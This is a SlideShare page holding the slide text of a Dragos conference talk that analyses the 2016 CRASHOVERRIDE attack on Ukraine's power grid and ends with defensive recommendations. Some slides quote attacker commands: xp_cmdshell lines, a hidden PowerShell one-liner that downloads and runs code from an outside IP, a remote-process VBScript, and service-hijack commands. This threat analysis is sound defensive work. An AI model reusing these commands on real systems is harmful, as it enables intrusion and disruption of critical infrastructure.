SlideShare a Scribd company logo

Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE

Dragos, Inc.
Dragos, Inc.

Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE by Dragos Adversary Hunter Joe Slowik - as presented at Virus Bulletin Oct 2018

Technology
1 of 50
Download to read offline
• Event Background • Initial Intrusion • ICS Effects • Conclusions
• First (only?) publicly-known malware targeting grid operations • Designed to: • Disrupt grid operations • Impede grid recovery
• 17 Dec 2016, 23:53 Local Time: • Ukrenergo substation de- energizes • Resulted in outage for service area • Utility transferred into manual mode • Began restoring power in 30 minutes
• Event was seemingly well-documented… • Critical questions unanswered: • Penetration of ICS network • In-depth evaluation of ICS capability • Context to build up layered defense
• No ICS-specific malware deployed • Attack was manual in nature: • Adversary established remote access to engineering workstation • Manipulated controls to produce effect
• Significant alteration in tradecraft • Attack leveraged ICS-specific malware • Codifies specialist knowledge in software • Enables operations to scale
• Precise methodology unknown • Large-scale phishing events in Ukraine in January 2016 • First definite indications of activity within network: October 2016
• Adversary begins manipulating ICS network devices 01 December 2016 • Creates attacker-controlled accounts: • Admin • Система (‘System’) • Attempts remote access to multiple systems with credentials
• Environment contained 3 MS-SQL servers • Connected to production equipment • Likely serving as data historians within the victim environment • First accessed on 12 December 2016
• Subsequent activity focuses on using SQL Servers to interact with environment • Extensive use of MS-SQL commands for command execution: EXEC xp_cmdshell <command>
EXEC xp_cmdshell 'net use L: <TargetIP>$C <Password> /USER:<Domain><User>’; EXEC xp_cmdshell 'move C:Deltam32.txt C:Deltam32.exe’; EXEC xp_cmdshell 'netstat -an';
• Use of Mimikatz for credential capture • Two variants: • Compiled version of Github repo • Same, but UPX packed • Credential capture and re-use critical to intrusion
• Once within network and possessing credentials: • File movement utilized NET utilities • Captured credentials allowed for remote access and file copying
• XP_CMDSHELL used for code execution on SQL Servers • Code execution on other devices leveraged various remote means: • Scripts • PSExec
• Use of custom BAT scripts: • Process execution • System survey and recon • Attack pre-positioning • General avoidance of malware
powershell.exe -nop -w hidden -c $l=new- object net.webclient;$l.proxy=[Net.WebRequest]::Ge tSystemWebProxy();$l.Proxy.Credentials=[Net .CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://188.42.253.43:880 1/msupdate');
Function RunRemoteProcess(Command) Set objStartup = objSWbemServices.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = 0 Set objProcess = objSWbemServices.Get("Win32_Process") strCmd = "cmd.exe /c " & Command & " >> " & GetReportFile() intReturn = objProcess.Create(strCmd, Null, objConfig, intProcessID) If intReturn <> 0 Then Wscript.Echo "Process could not be created." & _ vbNewLine & "Command line: " & strCmd & _ vbNewLine & "Return value: " & intReturn RunRemoteProcess = 2 Exit Function
cscript C:Backinfoufn.vbs <TargetIP 1> "C:BackinfoImapiService.exe" "C:Deltasvchost.exe" cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfo104.dll" "C:Delta104.dll" cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfo140.ini" "C:Delta104.ini" cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfohaslo.dat" "C:Deltahaslo.dat" cscript C:Backinfosqlc.vbs <TargetIP 1> "-c" "dir C:Delta" cscript C:Backinfoufn.vbs <TargetIP 2> "C:BackinfoImapiService.exe" "C:Deltasvchost.exe" cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfo104.dll" "C:Delta104.dll" cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfo128.ini" "C:Delta104.ini" cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfohaslo.dat" "C:Deltahaslo.dat" cscript C:Backinfosqlc.vbs <TargetIP 2> "-c" "dir C:Delta" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfodefragsvc.exe" "C:D2svchost.exe" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfo104.dll" "C:D2104.dll" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfo5.ini" "C:D2104.ini" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfohaslo.dat" "C:D2haslo.dat" cscript C:Backinfosqlc.vbs <TargetIP 3> "-c" "dir C:D2"
• Little to no use of obfuscation • Scripts are clearly written, functionality easily understood • With visibility, easy to detect
• Extensive use of Windows Sysinternals PSExec utility • However: • Used an older version – 2.11 • Released April 2014 • Latest version at time of attack was 2.2
• Designed and deployed a custom backdoor • Unnecessary given observed events • Provides basic RAT functionality • No built-in information gathering/exfil capability
• Backdoor compiled and deployed long after network intrusion • Capabilities provided already included in TTPs covered previously • Purpose for deployment unknown
• Deployment based on prior steps • Deploy via XP_CMDSHELL from SQL servers • Use credentials to remotely copy files • Scripted remote process execution to launch payloads
cscript C:Backinfosqlc.vbs <TargetIP 1> "-c" "sc config ImapiService binPath= 'C:Deltasvchost.exe C:Delta 104.dll 104.ini' start= auto && sc start ImapiService" cscript C:Backinfosqlc.vbs <TargetIP 2> "-c" "sc config ImapiService binPath= 'C:Deltasvchost.exe C:Delta 104.dll 104.ini' start= auto && sc start ImapiService" cscript C:Backinfosqlc.vbs <TargetIP 3> "-c" "sc config defragsvc binPath= 'C:D2svchost.exe C:D2 104.dll 104.ini' start= auto && sc start defragsvc"
• CRASHOVERRIDE execution starts with a dedicated launcher EXE • One stand-alone exception • Serves to: • Initiate payload, manage execution • Clean up and terminate
• Four modules targeting different ICS communication protocols: • IEC-101 • IEC-104 • IEC-61850 • OPC
• Different modules, but similar purpose • Goal: • Manipulate breakers and switch gear • Interrupt power distribution • Basically: turn things on/off (open/closed)
• Configuration files for some payloads indicate 80+ targets • Log file results indicate over 100 potential targets • Manual operations would not work for this level of impact
[*ServerName: ABB.IEC61850_OPC_DA_Server.Instance[3].1*] [State: After ON] OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI10PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI11PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI12PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI1PosstVal Quality: 192 value: 2 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI2PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI3PosstVal Quality: 192 value: 2 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI4PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI7PosstVal Quality: 192 value: 2
• Following grid impact, CRASHOVERRIDE moves to a new destructive stage • After a hard-coded wait time: • Destructive component launched • Specified in launcher component
Registry •Zeroes registry key ImagePath for critical services •Makes system unbootable Files •Erases ICS configuration files •Erases other file extensions Kills Processes • Kill the machine
• Finally – a denial of service stand-alone identified • Targets a Siemens SIPROTEC vulnerability from 2015: • CVE-2015-5374 • DoS via specially-crafted packet to UDP 50000
• EXE created with hard-coded target IP addresses • Only useful in the target environment • BUT: • Improper byte conversion applied for IP addresses • Results in IPs shifted in reverse when setting up sockets
• CRASHOVERRIDE attack part of a long- running intrusion • Attack avoided “malware” until final stages • Primary use of native system utilities and credential capture
• CRASHOVERRIDE provides an attack framework • BUT – exact attack will not be replicated • Instead: • Attack methodology will be re-used • Underlying behaviors will maintain similarity
Prevention • Protect Logon Info • Isolate and Segregate Networks Detection • Improve Host Visibility in ICS • Use Network Visibility to Detect Lateral Movement Mitigation • Implement Bastion Hosts • Structure Defense to Respond Earlier in Kill Chain Recovery • Develop and Rehearse Response Plans • Secure Storage of Backup Project Files
Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE

Recommended

CNIT 121: Computer Forensics Ch 1
CNIT 121: Computer Forensics Ch 1CNIT 121: Computer Forensics Ch 1
CNIT 121: Computer Forensics Ch 1Sam Bowne
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016Danny Akacki
 
The New Pentest? Rise of the Compromise Assessment
The New Pentest? Rise of the Compromise AssessmentThe New Pentest? Rise of the Compromise Assessment
The New Pentest? Rise of the Compromise AssessmentInfocyte
 
Hunting on the cheap
Hunting on the cheapHunting on the cheap
Hunting on the cheapAnjum Ahuja
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
CNIT 152: 6 Scoping & 7 Live Data Collection
CNIT 152: 6 Scoping & 7 Live Data CollectionCNIT 152: 6 Scoping & 7 Live Data Collection
CNIT 152: 6 Scoping & 7 Live Data CollectionSam Bowne
 
Hunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsHunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsSpyglass Security
 

Recommended

CNIT 121: Computer Forensics Ch 1
CNIT 121: Computer Forensics Ch 1CNIT 121: Computer Forensics Ch 1
CNIT 121: Computer Forensics Ch 1Sam Bowne
 
How to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkHow to Hunt for Lateral Movement on Your Network
How to Hunt for Lateral Movement on Your NetworkSqrrl
 
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016Danny Akacki
 
The New Pentest? Rise of the Compromise Assessment
The New Pentest? Rise of the Compromise AssessmentThe New Pentest? Rise of the Compromise Assessment
The New Pentest? Rise of the Compromise AssessmentInfocyte
 
Hunting on the cheap
Hunting on the cheapHunting on the cheap
Hunting on the cheapAnjum Ahuja
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabTeymur Kheirkhabarov
 
CNIT 152: 6 Scoping & 7 Live Data Collection
CNIT 152: 6 Scoping & 7 Live Data CollectionCNIT 152: 6 Scoping & 7 Live Data Collection
CNIT 152: 6 Scoping & 7 Live Data CollectionSam Bowne
 
Hunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsHunting: Defense Against The Dark Arts
Hunting: Defense Against The Dark ArtsSpyglass Security
 
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...Sam Bowne
 
Digital Forensics and Incident Response (DFIR) Training Session - January
Digital Forensics and Incident Response (DFIR) Training Session - JanuaryDigital Forensics and Incident Response (DFIR) Training Session - January
Digital Forensics and Incident Response (DFIR) Training Session - JanuaryInfocyte
 
CNIT 121: 11 Analysis Methodology
CNIT 121: 11 Analysis MethodologyCNIT 121: 11 Analysis Methodology
CNIT 121: 11 Analysis MethodologySam Bowne
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2Spyglass Security
 
3. Security Engineering
3. Security Engineering3. Security Engineering
3. Security EngineeringSam Bowne
 
Blackhat 2018 - The New Pentest? Rise of the Compromise Assessment
Blackhat 2018 - The New Pentest? Rise of the Compromise AssessmentBlackhat 2018 - The New Pentest? Rise of the Compromise Assessment
Blackhat 2018 - The New Pentest? Rise of the Compromise AssessmentChristopher Gerritz
 
Novetta Cyber Analytics
Novetta Cyber AnalyticsNovetta Cyber Analytics
Novetta Cyber AnalyticsNovetta
 
Hunting on the Cheap
Hunting on the CheapHunting on the Cheap
Hunting on the CheapEndgameInc
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckLuncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckNorth Texas Chapter of the ISSA
 
CNIT 121: 9 Network Evidence
CNIT 121: 9 Network EvidenceCNIT 121: 9 Network Evidence
CNIT 121: 9 Network EvidenceSam Bowne
 
Avoiding the Pitfalls of Hunting - BSides Charm 2016
Avoiding the Pitfalls of Hunting - BSides Charm 2016Avoiding the Pitfalls of Hunting - BSides Charm 2016
Avoiding the Pitfalls of Hunting - BSides Charm 2016Tony Cook
 
CNIT 121: 17 Remediation Introduction (Part 1)
CNIT 121: 17 Remediation Introduction (Part 1)CNIT 121: 17 Remediation Introduction (Part 1)
CNIT 121: 17 Remediation Introduction (Part 1)Sam Bowne
 
Threat Hunting with Elastic at SpectorOps: Welcome to HELK
Threat Hunting with Elastic at SpectorOps: Welcome to HELKThreat Hunting with Elastic at SpectorOps: Welcome to HELK
Threat Hunting with Elastic at SpectorOps: Welcome to HELKElasticsearch
 
CISSP Prep: Ch 7. Security Assessment and Testing
CISSP Prep: Ch 7. Security Assessment and TestingCISSP Prep: Ch 7. Security Assessment and Testing
CISSP Prep: Ch 7. Security Assessment and TestingSam Bowne
 
Enterprise Forensics 101
Enterprise Forensics 101Enterprise Forensics 101
Enterprise Forensics 101Mona Arkhipova
 
Orchestrating Software Defined Networks To Disrupt The Apt Kill Chain
Orchestrating Software Defined Networks To Disrupt The Apt Kill ChainOrchestrating Software Defined Networks To Disrupt The Apt Kill Chain
Orchestrating Software Defined Networks To Disrupt The Apt Kill ChainPriyanka Aash
 
Discover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy LiDiscover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy LiJeremy Li
 
Threat Intelligence Ops In-Depth at Massive Enterprise
Threat Intelligence Ops In-Depth at Massive EnterpriseThreat Intelligence Ops In-Depth at Massive Enterprise
Threat Intelligence Ops In-Depth at Massive EnterpriseJeremy Li
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 

More Related Content

What's hot

CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...Sam Bowne
 
Digital Forensics and Incident Response (DFIR) Training Session - January
Digital Forensics and Incident Response (DFIR) Training Session - JanuaryDigital Forensics and Incident Response (DFIR) Training Session - January
Digital Forensics and Incident Response (DFIR) Training Session - JanuaryInfocyte
 
CNIT 121: 11 Analysis Methodology
CNIT 121: 11 Analysis MethodologyCNIT 121: 11 Analysis Methodology
CNIT 121: 11 Analysis MethodologySam Bowne
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat HuntingGIBIN JOHN
 
Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2Spyglass Security
 
3. Security Engineering
3. Security Engineering3. Security Engineering
3. Security EngineeringSam Bowne
 
Blackhat 2018 - The New Pentest? Rise of the Compromise Assessment
Blackhat 2018 - The New Pentest? Rise of the Compromise AssessmentBlackhat 2018 - The New Pentest? Rise of the Compromise Assessment
Blackhat 2018 - The New Pentest? Rise of the Compromise AssessmentChristopher Gerritz
 
Novetta Cyber Analytics
Novetta Cyber AnalyticsNovetta Cyber Analytics
Novetta Cyber AnalyticsNovetta
 
Hunting on the Cheap
Hunting on the CheapHunting on the Cheap
Hunting on the CheapEndgameInc
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzChristopher Gerritz
 
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckLuncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckNorth Texas Chapter of the ISSA
 
CNIT 121: 9 Network Evidence
CNIT 121: 9 Network EvidenceCNIT 121: 9 Network Evidence
CNIT 121: 9 Network EvidenceSam Bowne
 
Avoiding the Pitfalls of Hunting - BSides Charm 2016
Avoiding the Pitfalls of Hunting - BSides Charm 2016Avoiding the Pitfalls of Hunting - BSides Charm 2016
Avoiding the Pitfalls of Hunting - BSides Charm 2016Tony Cook
 
CNIT 121: 17 Remediation Introduction (Part 1)
CNIT 121: 17 Remediation Introduction (Part 1)CNIT 121: 17 Remediation Introduction (Part 1)
CNIT 121: 17 Remediation Introduction (Part 1)Sam Bowne
 
Threat Hunting with Elastic at SpectorOps: Welcome to HELK
Threat Hunting with Elastic at SpectorOps: Welcome to HELKThreat Hunting with Elastic at SpectorOps: Welcome to HELK
Threat Hunting with Elastic at SpectorOps: Welcome to HELKElasticsearch
 
CISSP Prep: Ch 7. Security Assessment and Testing
CISSP Prep: Ch 7. Security Assessment and TestingCISSP Prep: Ch 7. Security Assessment and Testing
CISSP Prep: Ch 7. Security Assessment and TestingSam Bowne
 
Enterprise Forensics 101
Enterprise Forensics 101Enterprise Forensics 101
Enterprise Forensics 101Mona Arkhipova
 
Orchestrating Software Defined Networks To Disrupt The Apt Kill Chain
Orchestrating Software Defined Networks To Disrupt The Apt Kill ChainOrchestrating Software Defined Networks To Disrupt The Apt Kill Chain
Orchestrating Software Defined Networks To Disrupt The Apt Kill ChainPriyanka Aash
 
Discover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy LiDiscover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy LiJeremy Li
 
Threat Intelligence Ops In-Depth at Massive Enterprise
Threat Intelligence Ops In-Depth at Massive EnterpriseThreat Intelligence Ops In-Depth at Massive Enterprise
Threat Intelligence Ops In-Depth at Massive EnterpriseJeremy Li
 

What's hot (20)

CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
CNIT 121: 4 Getting the Investigation Started on the Right Foot & 5 Initial D...
 
Digital Forensics and Incident Response (DFIR) Training Session - January
Digital Forensics and Incident Response (DFIR) Training Session - JanuaryDigital Forensics and Incident Response (DFIR) Training Session - January
Digital Forensics and Incident Response (DFIR) Training Session - January
 
CNIT 121: 11 Analysis Methodology
CNIT 121: 11 Analysis MethodologyCNIT 121: 11 Analysis Methodology
CNIT 121: 11 Analysis Methodology
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2Hunting: Defense Against The Dark Arts v2
Hunting: Defense Against The Dark Arts v2
 
3. Security Engineering
3. Security Engineering3. Security Engineering
3. Security Engineering
 
Blackhat 2018 - The New Pentest? Rise of the Compromise Assessment
Blackhat 2018 - The New Pentest? Rise of the Compromise AssessmentBlackhat 2018 - The New Pentest? Rise of the Compromise Assessment
Blackhat 2018 - The New Pentest? Rise of the Compromise Assessment
 
Novetta Cyber Analytics
Novetta Cyber AnalyticsNovetta Cyber Analytics
Novetta Cyber Analytics
 
Hunting on the Cheap
Hunting on the CheapHunting on the Cheap
Hunting on the Cheap
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
 
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin FalckLuncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
 
CNIT 121: 9 Network Evidence
CNIT 121: 9 Network EvidenceCNIT 121: 9 Network Evidence
CNIT 121: 9 Network Evidence
 
Avoiding the Pitfalls of Hunting - BSides Charm 2016
Avoiding the Pitfalls of Hunting - BSides Charm 2016Avoiding the Pitfalls of Hunting - BSides Charm 2016
Avoiding the Pitfalls of Hunting - BSides Charm 2016
 
CNIT 121: 17 Remediation Introduction (Part 1)
CNIT 121: 17 Remediation Introduction (Part 1)CNIT 121: 17 Remediation Introduction (Part 1)
CNIT 121: 17 Remediation Introduction (Part 1)
 
Threat Hunting with Elastic at SpectorOps: Welcome to HELK
Threat Hunting with Elastic at SpectorOps: Welcome to HELKThreat Hunting with Elastic at SpectorOps: Welcome to HELK
Threat Hunting with Elastic at SpectorOps: Welcome to HELK
 
CISSP Prep: Ch 7. Security Assessment and Testing
CISSP Prep: Ch 7. Security Assessment and TestingCISSP Prep: Ch 7. Security Assessment and Testing
CISSP Prep: Ch 7. Security Assessment and Testing
 
Enterprise Forensics 101
Enterprise Forensics 101Enterprise Forensics 101
Enterprise Forensics 101
 
Orchestrating Software Defined Networks To Disrupt The Apt Kill Chain
Orchestrating Software Defined Networks To Disrupt The Apt Kill ChainOrchestrating Software Defined Networks To Disrupt The Apt Kill Chain
Orchestrating Software Defined Networks To Disrupt The Apt Kill Chain
 
Discover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy LiDiscover advanced threats with threat intelligence - Jeremy Li
Discover advanced threats with threat intelligence - Jeremy Li
 
Threat Intelligence Ops In-Depth at Massive Enterprise
Threat Intelligence Ops In-Depth at Massive EnterpriseThreat Intelligence Ops In-Depth at Massive Enterprise
Threat Intelligence Ops In-Depth at Massive Enterprise
 

Similar to Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE

Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Горизонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsГоризонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsPositive Hack Days
 
HAVOC-Workshop-Slides.pptx
HAVOC-Workshop-Slides.pptxHAVOC-Workshop-Slides.pptx
HAVOC-Workshop-Slides.pptxseed4mexyz
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2Royce Davis
 
y3dips hacking priv8 network
y3dips hacking priv8 networky3dips hacking priv8 network
y3dips hacking priv8 networkidsecconf
 
idsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 networkidsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 networkAmmar WK
 
Project Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docxProject Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docxbriancrawford30935
 
Intro to sysdig in 15 minutes
Intro to sysdig in 15 minutesIntro to sysdig in 15 minutes
Intro to sysdig in 15 minutesSysdig
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 
3. APTs Presentation
3. APTs Presentation3. APTs Presentation
3. APTs Presentationisc2-hellenic
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Xavier Ashe
 
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.Nagios
 
Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!Michael Man
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxlior mazor
 
CCleaner APT Attack: A Technical Look Inside
CCleaner APT Attack: A Technical Look InsideCCleaner APT Attack: A Technical Look Inside
CCleaner APT Attack: A Technical Look InsidePriyanka Aash
 
Blackhat USA 2016 - What's the DFIRence for ICS?
Blackhat USA 2016 - What's the DFIRence for ICS?Blackhat USA 2016 - What's the DFIRence for ICS?
Blackhat USA 2016 - What's the DFIRence for ICS?Chris Sistrunk
 
CNIT 152: 1 Real-World Incidents
CNIT 152: 1 Real-World IncidentsCNIT 152: 1 Real-World Incidents
CNIT 152: 1 Real-World IncidentsSam Bowne
 
DCUS17 : Docker networking deep dive
DCUS17 : Docker networking deep diveDCUS17 : Docker networking deep dive
DCUS17 : Docker networking deep diveMadhu Venugopal
 

Similar to Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE (20)

Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
 
Горизонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре WindowsГоризонтальные перемещения в инфраструктуре Windows
Горизонтальные перемещения в инфраструктуре Windows
 
HAVOC-Workshop-Slides.pptx
HAVOC-Workshop-Slides.pptxHAVOC-Workshop-Slides.pptx
HAVOC-Workshop-Slides.pptx
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
 
y3dips hacking priv8 network
y3dips hacking priv8 networky3dips hacking priv8 network
y3dips hacking priv8 network
 
idsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 networkidsecconf2010-hacking priv8 network
idsecconf2010-hacking priv8 network
 
Project Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docxProject Malware AnalysisCS 6262 Project 3Agenda.docx
Project Malware AnalysisCS 6262 Project 3Agenda.docx
 
Intro to sysdig in 15 minutes
Intro to sysdig in 15 minutesIntro to sysdig in 15 minutes
Intro to sysdig in 15 minutes
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
 
3. APTs Presentation
3. APTs Presentation3. APTs Presentation
3. APTs Presentation
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
 
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
Lee Myers - What To Do When Nagios Notification Don't Meet Your Needs.
 
Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!Continuous Security: From tins to containers - now what!
Continuous Security: From tins to containers - now what!
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptxThe Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
 
CCleaner APT Attack: A Technical Look Inside
CCleaner APT Attack: A Technical Look InsideCCleaner APT Attack: A Technical Look Inside
CCleaner APT Attack: A Technical Look Inside
 
Blackhat USA 2016 - What's the DFIRence for ICS?
Blackhat USA 2016 - What's the DFIRence for ICS?Blackhat USA 2016 - What's the DFIRence for ICS?
Blackhat USA 2016 - What's the DFIRence for ICS?
 
CNIT 152: 1 Real-World Incidents
CNIT 152: 1 Real-World IncidentsCNIT 152: 1 Real-World Incidents
CNIT 152: 1 Real-World Incidents
 
DCUS17 : Docker networking deep dive
